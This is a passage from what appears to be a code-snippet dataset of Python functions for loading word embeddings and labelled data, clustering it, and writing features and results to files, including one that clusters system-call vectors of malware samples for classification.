open(graph+'_features','wb')\n\tpickle.dump(graph_data, outfile)", "def load_file(filename):\n\tlabels = []\n\tdocs = []\n\n\twith open(filename) as f:\n\t\tfor line in f:\n\t\t\tcontent = line.split('\\t')\n\n\t\t\tif len(content) > 2:\n\t\t\t\tprint('incorrect read')\n\t\t\t\texit()\n\n\t\t\tif len(content[1]) == 0: continue\n\n\t\t\tdocs.append(str(content[1]).strip('\\r').strip('\\n').strip('\\r\\n'))\n\t\t\tlabels.append(content[0])\n\n\treturn docs, labels", "def Clustering(typeVector, behaviour, sampleType):\r\n ProduceVector.produceVector(typeVector, behaviour, sampleType)\r\n vector = ProduceVector.getVector()\r\n\r\n if sampleType == \"\":\r\n sampleType2 = \"ransomware\"\r\n if sampleType == \"2\":\r\n sampleType2 = \"backdoor\"\r\n if sampleType == \"3\":\r\n sampleType2 = \"trojan\"\r\n\r\n if (behaviour == \"f\") or (behaviour == \"fc\"): \r\n\r\n calculateStandardisation(vector)\r\n vector = getStandardisation()\r\n\r\n typeOfVector = typeVector + \" \" + behaviour\r\n\r\n nGram, syscallRep = typeOfVector.split()\r\n\r\n if syscallRep == \"b\":\r\n nGram += \"Full Representation Bit Vector\"\r\n if syscallRep == \"f\":\r\n nGram += \"Full Representation Frequency Vector\"\r\n if syscallRep == \"bc\":\r\n nGram += \"Category Bit Vector\"\r\n if syscallRep == \"fc\":\r\n nGram += \"Category Frequency Vector\"\r\n\r\n\r\n fileName = sampleType2 + \" \" + syscallRep + \" standardisation \" + nGram + \".txt\"\r\n\r\n file = open(fileName, \"w\")\r\n file.write(str(vector.tolist()))\r\n file.close()\r\n\r\n calculateEuclideanDistance(vector) \r\n\r\n typeOfVector = typeVector + \" \" + behaviour\r\n\r\n nGram, syscallRep = typeOfVector.split()\r\n\r\n if syscallRep == \"b\":\r\n nGram += \"Full Representation Bit Vector\"\r\n if syscallRep == \"f\":\r\n nGram += \"Full Representation Frequency Vector\"\r\n if syscallRep == \"bc\":\r\n nGram += \"Category Bit Vector\"\r\n if syscallRep == \"fc\":\r\n nGram += \"Category Frequency Vector\" \r\n\r\n fileName = sampleType2 + \" \" + syscallRep + \" matrix \" + nGram + \".txt\"\r\n\r\n file = open(fileName, \"w\")\r\n file.write(str(getEuclideanDistance().tolist()))\r\n file.close()\r\n\r\n print(\"Producing a dendrogram\")\r\n\r\n\r\n typeOfVector = typeVector + \" \" + behaviour\r\n\r\n setBestCluster(Validation.evaluate(getEuclideanDistance(), vector, typeOfVector, sampleType))", "def write_svm_features(clf, vectorizer, round=1, filename=\"features\"):\n\n f = open(\"%s-round%d.txt\" % (filename, round), \"w\")\n weight_feature_pairs = zip(clf.coef_.tolist()[0], vectorizer.feature_names_)\n weight_feature_pairs.sort(key=lambda x:abs(x[0]), reverse=True)\n for weight, word in weight_feature_pairs:\n f.write(\"%s\\t%g\\n\" % (word, weight))\n f.close()", "def load_data(path=\"data/cora/\", dataset=\"cora\"):\n print('Loading {} dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset),\n dtype=np.dtype(str))\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n labels = encode_onehot(idx_features_labels[:, -1])\n\n n_nodes, d_edge = features.shape\n\n # build graph\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset),\n dtype=np.int32)\n print(edges_unordered)\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]),\n dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n node_features = normalize(features)\n adj = normalize(adj + sp.eye(adj.shape[0]))\n\n # Edge matrix\n edge_features = None\n is3d = False\n if(is3d):\n indices = [[], [] , []]\n values = []\n sizes = [n_nodes, n_nodes, d_edge]\n\n i, j = adj.nonzero()\n for e in range(len(i)):\n i_idx = node_features[i[e],:].nonzero()[1]\n j_idx = node_features[j[e],:].nonzero()[1]\n for ii in i_idx:\n indices[0].append(i[e])\n indices[1].append(j[e])\n indices[2].append(ii)\n if ii in j_idx:\n values.append((node_features[i[e],:][0,ii] + node_features[j[e],:][0,ii])/2)\n else:\n values.append(node_features[i[e],:][0,ii])\n for jj in j_idx:\n if jj in j_idx:\n continue\n else:\n indices[0].append(i[e])\n indices[1].append(j[e])\n indices[2].append(jj)\n values.append(node_features[j[e],:][0,jj])\n indices = torch.LongTensor(indices)\n values = torch.FloatTensor(values)\n edge_features = torch.sparse_coo_tensor(indices, values, sizes)\n else:\n indices = [[], []]\n values = []\n sizes = [n_nodes*n_nodes, d_edge]\n\n i, j = adj.nonzero()\n for e in range(len(i)):\n i_idx = node_features[i[e],:].nonzero()[1]\n j_idx = node_features[j[e],:].nonzero()[1]\n for ii in i_idx:\n indices[0].append(i[e]+n_nodes*j[e])\n indices[1].append(ii)\n if ii in j_idx:\n values.append((node_features[i[e],:][0,ii] + node_features[j[e],:][0,ii])/2)\n else:\n values.append(node_features[i[e],:][0,ii])\n for jj in j_idx:\n if jj in j_idx:\n continue\n else:\n indices[0].append(i[e]+n_nodes*j[e])\n indices[1].append(jj)\n values.append(node_features[j[e],:][0,jj])\n indices = torch.LongTensor(indices)\n values = torch.FloatTensor(values)\n edge_features = torch.sparse_coo_tensor(indices, values, sizes)\n\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n\n node_features = torch.FloatTensor(np.array(node_features.todense()))\n\n labels = torch.LongTensor(np.where(labels)[1])\n adj = sparse_mx_to_torch_sparse_tensor(adj)\n\n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, edge_features, node_features, labels, idx_train, idx_val, idx_test", "def parse_vcf(filename, gff_contigs):\n with open(filename, \"r\") as f:\n for line in f:\n if line[0] == \"#\": # ignore comment lines in vcf file\n continue\n\n elements = line.rstrip().split(\"\\t\")\n name = elements[0] # name of the contig / chromosome SNP found on\n pos = elements[1] # position of SNP in contig\n ref = elements[3] # reference basepair(s)\n alt = elements[4] # SNP basepair(s) at same location\n qual = float(elements[5]) # SNP quality, might want to filter this\n contig = gff_contigs[name] # grab contig where SNP is located\n\n # iterate over GFF annotations on his contig, printing those that\n # overlap with the position of the SNP.\n for feature in contig:\n if pos >= feature.start and pos <= feature.stop:\n extract_feature_notes(feature.contig, feature.type, feature.start, feature.stop, feature.direction, feature.notes, pos, ref, alt) # prints info", "def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word).lower()\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs", "def read_features_from_file(filename):\n f = loadtxt(filename)\n return f[:, :4], f[:, 4:] # feature locations, descriptors", "def main(argv):\n dataset_filename = argv[0]\n clusters_filename = dataset_filename + \".clusters.json\"\n output_filename = dataset_filename + \".output.json\"\n log_file = dataset_filename + \".log\"\n\n logger, handler = initialize_logger(log_file)\n logger.info('Start: Version 1.0.1')\n logger.debug('Logger initialized')\n logger.debug('sys.argv: %r', sys.argv)\n\n logger.debug('Loading dataset')\n dataset = load_dataset(dataset_filename)\n logger.info('Dataset loaded')\n\n logger.info('Trying to load clusters from %s', clusters_filename)\n clusters = None\n try:\n clusters = json.load(open(clusters_filename, 'r'))\n except FileNotFoundError:\n logger.warning('Clusters data file not found')\n except json.decoder.JSONDecodeError:\n logger.warning('File broken. Not Json Decodable')\n\n if not clusters:\n logger.debug('Clustering data points')\n clusters = clustering(dataset, logger)\n logger.debug(\n 'Dumping clusters data into json file: %s', clusters_filename)\n json.dump(clusters, open(clusters_filename, 'w'))\n logger.info('Data points clustered')\n\n logger.debug('Calculating meta-feature indicators')\n features = meta_features.meta_features(clusters)\n logger.debug(\n 'Dumping meta-feature indicators into json file: %s',\n clusters_filename)\n json.dump(features, open(output_filename, 'w'))\n logger.info('Meta-feature indicators calculated')\n\n logger.info('Completed')\n logger.removeHandler(handler)", "def write_vecs(self, vecs_fname):\r\n header = f'{self.vectors.shape[0]} {self.vectors.shape[1]}'\r\n np.savetxt(vecs_fname, np.hstack([self.words.reshape(-1, 1), self.vectors]), fmt='%s', header=header)", "def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs", "def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs", "def import_data_format_iris(file):\n\tdata = []\n\tcluster_location =[]\n\tf = open(str(file), 'r')\n\tfor line in f:\n\t\tcurrent = line.split(\",\")\n\t\tcurrent_dummy = []\n\t\tfor j in range(0,len(current)-1):\n\t\t\tcurrent_dummy.append(float(current[j]))\n\t\tj+=1 \n\t\t#print current[j]\n\t\tif current[j] == \"Iris-setosa\\n\":\n\t\t\tcluster_location.append(0)\n\t\telif current[j] == \"Iris-versicolor\\n\":\n\t\t\tcluster_location.append(1)\n\t\telse:\n\t\t\tcluster_location.append(2)\n\t\tdata.append(current_dummy)\n\tprint \"finished importing data\"\n\treturn data , cluster_location", "def glove(data_fname='glove.840B.300d.txt', out_fname='glove.pkl'):\n words, U, dim = [], [], None\n with open(DATA_DIR + data_fname, 'rb') as f:\n for j, line in enumerate(f):\n x = line.strip().split()\n word, vector, d = x[0], np.ravel(x[1:]), len(x) - 1\n if dim is None: dim = d\n elif d != dim: raise Exception('{0}: {1}!={2}'.format(j, dim, d))\n U.append(vector)\n words.append(word)\n U = np.array(U)\n print \"Found {0} words\".format(len(words))\n print \"Found {0}x{1} embedding matrix\".format(*U.shape)\n with open(DATA_DIR + out_fname, 'wb') as f:\n cPickle.dump((words, U), f)", "def data_word2vec_one_label(input_file,\n word2vec_model):\n vocab = dict([(k, v.index) for (k, v) in word2vec_model.wv.vocab.items()])\n\n def _token_to_index(content):\n result = []\n for item in content:\n word2id = vocab.get(item)\n if word2id is None:\n word2id = 0\n result.append(word2id)\n return result\n\n\n with open(input_file) as fin:\n raw_tokens_list_gov = []\n raw_tokens_list_art = []\n test_id_list = []\n content_index_list_gov = []\n content_index_list_art = []\n # labels_list = []\n onehot_labels_list = []\n labels_num_list = []\n total_line = 0\n\n for each_line in fin:\n data = json.loads(each_line)\n ds_art = data['testid']\n ds = ds_art.split(\"_\")[0]\n art = ds_art.split(\"_\")[1][1:-1]\n test_id = ds + \"_\" + art\n features_content_gov = data['gov']\n features_content_art = data['art']\n label = data['label']\n\n test_id_list.append(test_id)\n content_index_list_gov.append(_token_to_index(\n features_content_gov))\n content_index_list_art.append(_token_to_index(\n features_content_art))\n\n raw_tokens_list_gov.append(features_content_gov)\n raw_tokens_list_art.append(features_content_art)\n\n # labels_list.append(label)\n # onehot_labels_list.append(_create_onehot_labels(labels_index,\n # num_labels))\n onehot_labels_list.append(label)\n labels_num = 1\n labels_num_list.append(labels_num)\n total_line += 1\n\n\n class _Data:\n def __init__(self):\n pass\n\n @property\n def number(self):\n return total_line\n\n @property\n def testid(self):\n return test_id_list\n\n @property\n def raw_tokens_gov(self):\n return raw_tokens_list_gov\n\n @property\n def raw_tokens_art(self):\n return raw_tokens_list_art\n\n @property\n def tokenindex_gov(self):\n return content_index_list_gov\n\n @property\n def tokenindex_art(self):\n return content_index_list_art\n\n # @property\n # def labels(self):\n # return labels_list\n\n @property\n def onehot_labels(self):\n return onehot_labels_list\n\n @property\n def labels_num(self):\n return labels_num_list\n\n return _Data()", "def load_glove(path):\n with open(path) as f:\n glove = {}\n for line in f.readlines():\n values = line.split()\n word = values[0]\n vector = np.array(values[1:], dtype='float32')\n glove[word] = vector\n return glove", "def load_glove(path):\n with open(path) as f:\n glove = {}\n for line in f.readlines():\n values = line.split()\n word = values[0]\n vector = np.array(values[1:], dtype='float32')\n glove[word] = vector\n return glove", "def print_cluster(self):\n print('Cluster', self.number)\n for pattern in self.patterns:\n pattern.print_pattern()", "def senna(vector_f='embeddings.txt', words_f ='words.lst', out_f='senna.pkl'):\n with open(DATA_DIR + words_f, 'rb') as f:\n words = [line.strip() for line in f]\n M = np.loadtxt(DATA_DIR + vector_f)\n print \"Found {0} words\".format(len(words))\n print \"Found {0}x{1} embedding matrix\".format(*M.shape)\n with open(DATA_DIR + out_f, 'wb') as f:\n cPickle.dump((words, M), f)", "def main():\n for dim in (50, 100, 200, 300):\n data_file = data.FileFinder().get_file('GLOVE_TXT_FILE').format(dim)\n output_file = data.FileFinder().get_file('GLOVE_WORD2VEC_FILE').format(dim)\n print(\"Converting {} to {}\".format(data_file, output_file))\n glove2word2vec(data_file, output_file)", "def cluster(log, inputf, clustindx, lmax, clustsize):\n cmdargs = split('cluster --in={} --thresh=0.01 --oindex={} \\\n --olmax={} --osize={} --mm'.format(\n inputf, clustindx, lmax, clustsize))\n proc = Popen(cmdargs, stdout=PIPE, stderr=STDOUT)\n log.info(proc.stdout.read())", "def load_labels_index_map(self, file_path):\n with open(file_path) as handle:\n self._labels_2_index = json.loads(handle.read())\n self._index_2_labels = {i: label.lower() for label, i in self._labels_2_index.items()}\n self._labels_dim = len(self._labels_2_index)", "def load_bin_vec(self, fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n print header\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32')\n # logger.info(word_vecs[word])\n else:\n f.read(binary_len)\n # logger.info(\"num words already in word2vec: \" + str(len(word_vecs)))\n return word_vecs", "def gather_and_save_vectors(path, words_vec = collections.defaultdict(list), features = []):\n with open(path, 'rt', encoding='mac_roman') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='\"')\n for row in csvreader:\n words_vec, features = countize(row[3], row[2], words_vec, features)\n try:\n words_vec, features = countize(row[6], row[2], words_vec, features)\n except:\n pass\n pickle.dump(words_vec, open(\"ind_vectors.data\", \"wb\"))\n pickle.dump(features, open(\"i_features.data\", \"wb\"))\n return words_vec, features", "def graph(self, file_data):\n\n self.file_data = file_data\n self.features, self.headers = get_features(file_data)\n\n # FIXME make it so that the outliers can be visualized as well\n self.new_scaled_features, self.features = manipulate_features(self.features, file_data)\n # features = scaler.inverse_transform(new_scaled_features)\n\n if self.show_outliers:\n self.new_scaled_features, self.outliers, self.outlier_detector = find_and_remove_outliers(\n self.new_scaled_features)\n\n if self.manually_find_remove_outliers:\n selector = remove_outliers(self.new_scaled_features)\n\n self.new_scaled_features = self.new_scaled_features[selector.indexes]\n self.features = self.features[selector.indexes]\n\n self.labels = self.clf.predict(self.new_scaled_features)\n self.color_labels = list(map(lambda x: 'r' if x == 0 else 'b', self.labels))", "def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs", "def assign_labels_to_centroids(self):\n labelled_centroids = []\n for i in range(len(self.final_clusters)):\n labels = map(lambda x: x[0], self.final_clusters[i])\n # pick the most common label\n most_common = Counter(labels).most_common(1)[0][0]\n c = np.round(len([item for item in self.final_clusters[i] if item[0]==1])/len(self.final_clusters[i]),2)\n if c>=0.46:\n most_common = 1.0\n centroid = (most_common, self.final_centroids[i])\n labelled_centroids.append(centroid)\n\n self.labelled_centroids = labelled_centroids\n print(\"cluster_0: \", np.round(len([item for item in self.final_clusters[0] if item[0]==1])/len(self.final_clusters[0]),2), \"size_0: \", len(self.final_clusters[0]))\n print(\"cluster_1: \", np.round(len([item for item in self.final_clusters[1] if item[0]==1])/len(self.final_clusters[1]),2), \"size_1: \", len(self.final_clusters[1]))\n #print(\"cluster_2: \", np.round(len([item for item in self.final_clusters[2] if item[0]==1])/len(self.final_clusters[2]),2), \"size_2: \", len(self.final_clusters[2]))\n #print(\"cluster_3: \", np.round(len([item for item in self.final_clusters[3] if item[0]==1])/len(self.final_clusters[3]),2), \"size_2: \", len(self.final_clusters[3]))", "def main(dataset=None, min_dens=1 * 10 ** -6, eps=0.0001, h=7):\n if dataset is None:\n dataset = pd.read_csv(\"iris.txt\", header=None, names=[\"x1\", \"x2\", \"x3\", \"x4\", \"label\"])\n print(f\"Inputs mindensity:{min_dens}\\teps:{eps}\\th:{h}\")\n cluster_map, cluster_center = denclue(np.array(dataset.iloc[:, [0, 1, 2, 3]]), min_dens, eps, h)\n dataset[\"cluster\"] = -1\n for c, points in cluster_map.items():\n dataset.at[points, \"cluster\"] = c\n print(\"Attractor:\", cluster_center[c])\n print(\"Points in cluster:\", points)\n print(\"Size of each cluster\")\n print(\"Clusters Assigned by Algorithm:\", \"\\n\", dataset.groupby(by=\"cluster\").count()['x1'])\n print(\"Original Clusters:\", \"\\n\", dataset.groupby(by=\"label\").count()['x1'])\n print(\"Purity:\", calculate_purity(dataset, len(cluster_map)))", "def cluster_dstructure_output(self, curs, output_fname, order_1st_id2all_clusters):\n\t\tfrom codense.common import get_gene_no2gene_id\n\t\tgene_no2gene_id = get_gene_no2gene_id(curs)\n\t\tsys.stderr.write(\"Outputting cluster information...\")\n\t\toutf = open(output_fname, 'w')\n\t\tstr_tmp_list0 = []\t#hold the 1st-order clusters\n\t\tfor order_1st_id,all_2nd_order_clusters in order_1st_id2all_clusters.iteritems():\n\t\t\tstr_tmp_list1 = []\t#hold the 2nd-order clusters\n\t\t\tfor order_2nd_id,cluster_list in all_2nd_order_clusters.iteritems():\n\t\t\t\tstr_tmp_list2 = []\t#hold the connected components\n\t\t\t\tfor cluster in cluster_list:\n\t\t\t\t\tstr_tmp = self.return_string_form_of_cluster_dstructure(cluster, gene_no2gene_id)\n\t\t\t\t\tstr_tmp_list2.append(str_tmp)\n\t\t\t\tstr_tmp_list1.append(\"[%s]\"%','.join(str_tmp_list2))\n\t\t\tstr_tmp_list0.append(\"[%s]\"%\",\".join(str_tmp_list1))\n\t\t#'r:=' is for directly read in as an array\n\t\toutf.write(\"r:=[%s]:\"%\",\".join(str_tmp_list0))\n\t\toutf.close()\n\t\tsys.stderr.write(\"Done.\\n\")", "def extract_labels(nlabels,filename, one_hot=False):\n print('Extracting', filename,'bbbccicicicicib')\n\n labels=numpy.loadtxt(filename,dtype='int64')\n \n if one_hot:\n print(\"LABELS ONE HOT\")\n print(labels.shape)\n XXX=dense_to_one_hot(labels,nlabels)\n print(XXX.shape)\n return dense_to_one_hot(labels,nlabels)\n print(\"LABELS\")\n print(labels.shape)\n return labels", "def load_vectors(vec_file, info_file, buckets):\n vectors = np.load(vec_file)\n with open(info_file, 'r') as f:\n info = json.load(f)\n\n if len(info['sequence_id_list']) != len(info['instance_id_list']):\n raise ValueError('Invalid info file: len(info[''sequence_id_list'']) should be equal to len(info[''instance_id_list'']) but got %d != %d' % (len(info['sequence_id_list']), len(info['instance_id_list'])))\n if vectors.shape[0] != len(info['instance_id_list']):\n raise ValueError('Number of vectors and length of info list are not identical. %d != %d' % (len(info['sequence_id_list']), len(info['instance_id_list'])))\n\n num_vec, vec_dim = vectors.shape\n prev_seq_id, prev_ins_id = None, None\n seq_ids = {i: [] for i in xrange(len(buckets))}\n ins_ids = {i: [] for i in xrange(len(buckets))}\n data = {i: [] for i in xrange(len(buckets))}\n\n for vec_idx in tqdm(xrange(num_vec)):\n curr_seq_id, curr_ins_id = info['sequence_id_list'][vec_idx], info['instance_id_list'][vec_idx]\n if curr_seq_id != prev_seq_id or curr_ins_id != prev_ins_id:\n if prev_seq_id is not None:\n bucket_id, curr_sample = bucketing(vec_count, buckets, vec_dim, curr_sample)\n seq_ids[bucket_id].append(prev_seq_id)\n ins_ids[bucket_id].append(prev_ins_id)\n data[bucket_id].append(curr_sample)\n vec_count = 1\n curr_sample = vectors[vec_idx]\n else:\n vec_count += 1\n curr_sample = np.vstack((curr_sample, vectors[vec_idx]))\n prev_seq_id = curr_seq_id\n prev_ins_id = curr_ins_id\n\n # throw the last sample into bucket\n bucket_id, curr_sample = bucketing(vec_count, buckets, vec_dim, curr_sample)\n seq_ids[bucket_id].append(prev_seq_id)\n ins_ids[bucket_id].append(prev_ins_id)\n data[bucket_id].append(curr_sample)\n\n return data, seq_ids, ins_ids", "def get_labeled_data(filename):\n e = []\n y = []\n with open(filename) as f:\n for line in f:\n e.append(line[1:-1])\n y.append(category_mapping[abbreviation_mapping[line[0]]])\n return e, y", "def k_means(n_clust, data_frame, true_labels):\n k_means = KMeans(n_clusters=n_clust, random_state=123, n_init=30)\n k_means.fit(data_frame)\n c_labels = k_means.labels_\n df = pd.DataFrame({'clust_label': c_labels, 'orig_label': true_labels.tolist()})\n ct = pd.crosstab(df['clust_label'], df['orig_label'])\n y_clust = k_means.predict(data_frame)\n display(ct)\n print('% 9s' % 'inertia homo compl v-meas ARI AMI silhouette')\n print('%i %.3f %.3f %.3f %.3f %.3f %.3f'\n % (k_means.inertia_,\n homogeneity_score(true_labels, y_clust),\n completeness_score(true_labels, y_clust),\n v_measure_score(true_labels, y_clust),\n adjusted_rand_score(true_labels, y_clust),\n adjusted_mutual_info_score(true_labels, y_clust),\n silhouette_score(data_frame, y_clust, metric='euclidean')))", "def cluster_classification_tex(f,browsing_matrix,diversifying_matrix, weblog,session_data_threshold,cluster_type,classification_column_diversity,classification_wanted_transaction):\n divpat_classification_wanted_transaction = classification_wanted_transaction\n divpat_N_classification_wanted_transaction=len(divpat_classification_wanted_transaction)\n f.write(\"\\n% 6. Cluster Classification\")\n columns_latex = '|'+'c|'*len(session_data_threshold[cluster_type].unique())\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DivColumnsLatex',columns_latex)) \n columns_blank = ' ' + '& '*(len(session_data_threshold[cluster_type].unique()) -1)\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DivColumnsBlank',columns_blank)) \n cluster_list = []\n ieuc_clusters = []\n star_chain_like_clusters = []\n length_clusters = []\n browsing_pattern_1 = []\n browsing_pattern_2 = []\n browsing_pattern_3 = []\n diversifying_pattern_1 = []\n diversifying_pattern_2 = []\n diversifying_pattern_3 = []\n cluster_ids = session_data_threshold[cluster_type].unique()\n cluster_ids.sort()\n for cluster_id in cluster_ids:\n cluster_list.append(str(cluster_id))\n \n cluster_session_list=session_data_threshold[session_data_threshold[cluster_type]==cluster_id].session_id.values\n temp_cluster_weblog=weblog[weblog.session_id.isin(cluster_session_list)]\n pa,pa_names = proportional_abundance(temp_cluster_weblog,'requested_'+classification_column_diversity)\n cluster_entropy=ShannonEntropy(pa,normalize=True)\n \n ieuc_clusters.append(str(round(np.power(2.0,cluster_entropy),2)))\n star_chain_like_clusters.append(star_chain_str(session_data_threshold[session_data_threshold[cluster_type]==cluster_id].star_chain_like.mean()))\n length_clusters.append(length(session_data_threshold[session_data_threshold[cluster_type]==cluster_id].requests.mean()))\n # Browsing patterns\n r,c=np.unravel_index(browsing_matrix[cluster_id][:-1,:-1].argsort(axis=None)[::-1][:3],dims=(divpat_N_classification_wanted_transaction,divpat_N_classification_wanted_transaction))\n browsing_pattern_1.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*browsing_matrix[cluster_id][r[0],c[0]],divpat_classification_wanted_transaction[r[0]],divpat_classification_wanted_transaction[c[0]]))\n browsing_pattern_2.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*browsing_matrix[cluster_id][r[1],c[1]],divpat_classification_wanted_transaction[r[1]],divpat_classification_wanted_transaction[c[1]]))\n browsing_pattern_3.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*browsing_matrix[cluster_id][r[2],c[2]],divpat_classification_wanted_transaction[r[2]],divpat_classification_wanted_transaction[c[2]]))\n \n # Diversifying patterns\n r,c=np.unravel_index(np.nan_to_num(diversifying_matrix[cluster_id])[:-1,:-1].argsort(axis=None)[::-1][:3],dims=(divpat_N_classification_wanted_transaction,divpat_N_classification_wanted_transaction))\n diversifying_pattern_1.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*diversifying_matrix[cluster_id][r[0],c[0]],divpat_classification_wanted_transaction[r[0]],divpat_classification_wanted_transaction[c[0]]))\n diversifying_pattern_2.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*diversifying_matrix[cluster_id][r[1],c[1]],divpat_classification_wanted_transaction[r[1]],divpat_classification_wanted_transaction[c[1]]))\n diversifying_pattern_3.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*diversifying_matrix[cluster_id][r[2],c[2]],divpat_classification_wanted_transaction[r[2]],divpat_classification_wanted_transaction[c[2]]))\n\n del temp_cluster_weblog\n \n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DivClusterList',' & '.join(cluster_list)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DivIEUCClusters',' & '.join(ieuc_clusters)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('StarChainClusters',' & '.join(star_chain_like_clusters)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('LengthClusters',' & '.join(length_clusters)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('BrowsingPatternClustersOne',' & '.join(browsing_pattern_1)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('BrowsingPatternClustersTwo',' & '.join(browsing_pattern_2)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('BrowsingPatternClustersThree',' & '.join(browsing_pattern_3)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DiversifyingPatternClustersOne',' & '.join(diversifying_pattern_1)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DiversifyingPatternClustersTwo',' & '.join(diversifying_pattern_2)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DiversifyingPatternClustersThree',' & '.join(diversifying_pattern_3)))\n\n return f;", "def read_from_file(self,fn):\n fh = open(fn,\"r\")\n labels = []\n xyz = []\n sizes = []\n colors = []\n for line in fh.readlines():\n try:\n if not line.startswith(\"#\"):\n label,x,y,z,size,r,g,b = line.split(\",\")\n labels.append(label)\n xyz.append([x,y,z])\n sizes.append(size)\n colors.append((float(r),float(g),float(b)))\n except IOError, ioe:\n print \"IOError:\", ioe\n self._labels = np.array(labels)\n self._xyz = np.array(xyz).astype(\"f\")\n self._sizes = np.array(sizes).astype(\"f\")\n self._colors = np.array(colors)", "def load_point_cloud(self, filename):\n f = sio.loadmat(filename)\n data = f['blob'][:]\n data -= np.mean(data, 0)\n data /= np.amax(abs(data))\n label = DataHandler.get_label_from_filename(filename)\n if self.use_softmax:\n l = np.zeros([2])\n l[label] = 1\n label = l\n return data, label", "def dump_vecs():\n v_file = os.path.join(TMP_DIR, 'vectorizer.pickle')\n d_file = os.path.join(TMP_DIR, 'dectorizer.pickle')\n f_file = os.path.join(TMP_DIR, 'freq.pickle')\n \n with open(v_file, 'wb') as f:\n pickle.dump(VECTORIZER, f)\n with open(d_file, 'wb') as f:\n pickle.dump(CECTORIZER, f)", "def clustering(pcd: o3d.geometry.PointCloud):\n with o3d.utility.VerbosityContextManager(o3d.utility.VerbosityLevel.Debug) as cm:\n labels = np.array(pcd.cluster_dbscan(eps=1, min_points=30, print_progress=True))\n\n max_label = labels.max()\n print(f\"point cloud has {max_label + 1} clusters\")\n colors = plt.get_cmap(\"tab20b\")(labels / (max_label if max_label > 0 else 1))\n colors[labels < 0] = 0\n pcd.colors = o3d.utility.Vector3dVector(colors[:, :3])\n return pcd, labels", "def load_vectors_novocab(path: str) -> (Optional[str], dict):\n print(f\"Started loading vectors from {path} @ {datetime.now()}\")\n words = dict()\n try:\n with open(file=path, mode=\"r\", encoding=\"utf-8\") as source_file:\n # Get the first line. Check if there's only 2 space-separated strings (hints a dimension)\n dimensions = str(next(source_file))\n if len(dimensions.split(\" \")) == 2:\n # We have a dimensions line. Keep it in the variable, continue with the next lines\n pass\n else:\n # We do not have a dimensions line\n line = dimensions.split(' ', 1)\n key = line[0]\n 